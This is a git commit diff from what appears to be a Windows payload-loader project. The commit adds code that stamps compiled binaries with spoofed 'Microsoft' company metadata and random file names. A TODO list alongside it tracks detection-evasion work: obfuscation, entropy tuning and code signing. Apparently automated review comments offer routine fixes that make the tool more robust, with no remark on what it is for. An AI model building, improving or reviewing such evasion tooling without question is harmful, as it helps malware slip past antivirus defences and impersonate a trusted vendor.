add: change PE metadata

maybe it's bad to generate it randomly; maybe it would be better to use random real words
2023-09-04 20:30:18 +02:00
parent 45bc629176
commit d233a273a3
7 changed files with 165 additions and 1 deletions

2
.gitignore vendored

@@ -4,3 +4,5 @@
__pycache__
Debug
Release
config.h
sample.h

100
DllExecutor.rc Normal file

@@ -0,0 +1,100 @@
// Microsoft Visual C++ generated resource script.
//
#include "resource.h"
#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "winres.h"
/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
// Fran<61>ais (France) resources
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_FRA)
LANGUAGE LANG_FRENCH, SUBLANG_FRENCH
#pragma code_page(1252)
#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//
1 TEXTINCLUDE
BEGIN
"resource.h\0"
END
2 TEXTINCLUDE
BEGIN
"#include ""winres.h""\r\n"
"\0"
END
3 TEXTINCLUDE
BEGIN
"\r\n"
"\0"
END
#endif // APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Version
//
VS_VERSION_INFO VERSIONINFO
FILEVERSION 1,0,0,1
PRODUCTVERSION 1,0,0,1
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
#else
FILEFLAGS 0x0L
#endif
FILEOS 0x40004L
FILETYPE 0x1L
FILESUBTYPE 0x0L
BEGIN
BLOCK "StringFileInfo"
BEGIN
BLOCK "040c04b0"
BEGIN
VALUE "CompanyName", "Microsoft"
VALUE "FileDescription", "vhasdzagtqqfokxkxnwj"
VALUE "FileVersion", "1.0.0.1"
VALUE "InternalName", "apwjxnl.exe"
VALUE "LegalCopyright", "Copyright (C) 2023"
VALUE "OriginalFilename", "cwresrj.exe"
VALUE "ProductName", "fkdhtat.exe"
VALUE "ProductVersion", "1.0.0.1"
END
END
BLOCK "VarFileInfo"
BEGIN
VALUE "Translation", 0x40c, 1200
END
END
#endif // Fran<61>ais (France) resources
/////////////////////////////////////////////////////////////////////////////
#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//
/////////////////////////////////////////////////////////////////////////////
#endif // not APSTUDIO_INVOKED


@@ -117,6 +117,7 @@
<GenerateDebugInformation>false</GenerateDebugInformation>
<AdditionalOptions>/NXCOMPAT:no %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
<GenerateWindowsMetadata>true</GenerateWindowsMetadata>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
@@ -156,8 +157,12 @@
</ItemGroup>
<ItemGroup>
<ClInclude Include="config.h" />
<ClInclude Include="resource.h" />
<ClInclude Include="sample.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="DllExecutor.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
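Review bot: The `<GenerateWindowsMetadata>true</GenerateWindowsMetadata>` line added to the `<Link>` element in the first hunk is the linker's Windows Runtime metadata switch (it emits a .winmd alongside the binary), which presumably has nothing to do with embedding the version resource; the `<ResourceCompile Include="DllExecutor.rc" />` item in the second hunk is what actually compiles the resource in. It is also only set in this one configuration, while the Debug|x64 group that follows is untouched, so confirm whether it was intended or left over from experimenting. If it is not needed, drop the line rather than carry an extra linker output.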


@@ -26,5 +26,13 @@
<ClInclude Include="config.h">
<Filter>Fichiers d%27en-tête</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>Fichiers d%27en-tête</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="DllExecutor.rc">
<Filter>Fichiers de ressources</Filter>
</ResourceCompile>
</ItemGroup>
</Project>

10
gui.py

@@ -13,7 +13,6 @@ TODO :
- Good entropy
- Good Section sizes
- Add resources
- Change PE metadata (company, description, etc...)
- Random Windows API calls (help)
- Code signing (optional)
@@ -22,12 +21,14 @@ Done :
- Junk code
- Control flow
- IAT obfuscation (adding "normal" imports in addition to the others)
- Change PE metadata (company, description, etc...)
"""
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QCoreApplication
from obfuscation import obfuscate
from metadata import change_metadata
import os, shutil
class Ui_mainWindow(object):
@@ -168,6 +169,13 @@ class Ui_mainWindow(object):
self.label_2.setText("done.")
QCoreApplication.processEvents()
self.label_2.setText("Changing metadata...")
QCoreApplication.processEvents()
change_metadata()
self.label_2.setText("done.")
QCoreApplication.processEvents()
self.label_2.setText("Compiling...")
QCoreApplication.processEvents()
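Review bot: The new `change_metadata()` call in the third hunk runs with no error handling, and it rewrites `DllExecutor.rc` by relative path, so it depends on the process working directory; if the file is missing or cannot be decoded, the exception leaves the label stuck at "Changing metadata..." and, under PyQt5's default handling of unhandled exceptions in slots, presumably terminates the application rather than reporting the failure. Consider `try: change_metadata()` / `except OSError as e: self.label_2.setText(f"metadata failed: {e}"); return` so the pipeline stops with a visible message instead of proceeding to "Compiling...". The enclosing method starts and ends outside the hunk.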

27
metadata.py Normal file

@@ -0,0 +1,27 @@
from randomness import *
def change_metadata() :
f = open("DllExecutor.rc", "r")
f_c = f.readlines()
f.close()
o = open("DllExecutor.rc", "w")
for line in f_c :
if "CompanyName" in line :
line = f'\t\t\tVALUE "CompanyName", "Microsoft"\n'
elif "FileDescription" in line :
line = f'\t\t\tVALUE "FileDescription", "{GetRandomString(20)}"\n'
elif "InternalName" in line :
line = f'\t\t\tVALUE "InternalName", "{GetRandomString(7)}.exe"\n'
elif "OriginalFilename" in line :
line = f'\t\t\tVALUE "OriginalFilename", "{GetRandomString(7)}.exe"\n'
elif "ProductName" in line :
line = f'\t\t\tVALUE "ProductName", "{GetRandomString(7)}.exe"\n'
o.write(line)
o.close()
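Review bot: `change_metadata` opens `DllExecutor.rc` twice with no `with` block and no `encoding=`, yet the file it rewrites declares `#pragma code_page(1252)` and contains non-ASCII text in its comments, so with a UTF-8 default locale the `readlines()` call can raise `UnicodeDecodeError`, and where it does not, the file is silently transcoded on the way out. Use `with open("DllExecutor.rc", "r", encoding="cp1252") as f: lines = f.readlines()` and `with open("DllExecutor.rc", "w", encoding="cp1252") as o:` so both handles are closed on every path; since the write goes back to the same path, any failure inside the loop leaves a truncated resource script, which writing to a temporary file and `os.replace`-ing it over the original would avoid. Two smaller points of style: the `CompanyName` assignment is an f-string with no placeholders, and `from randomness import *` hides where `GetRandomString` comes from; importing it by name would make the dependency explicit.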

14
resource.h Normal file

@@ -0,0 +1,14 @@
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by DllExecutor.rc
// Valeurs par d<>faut suivantes des nouveaux objets
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif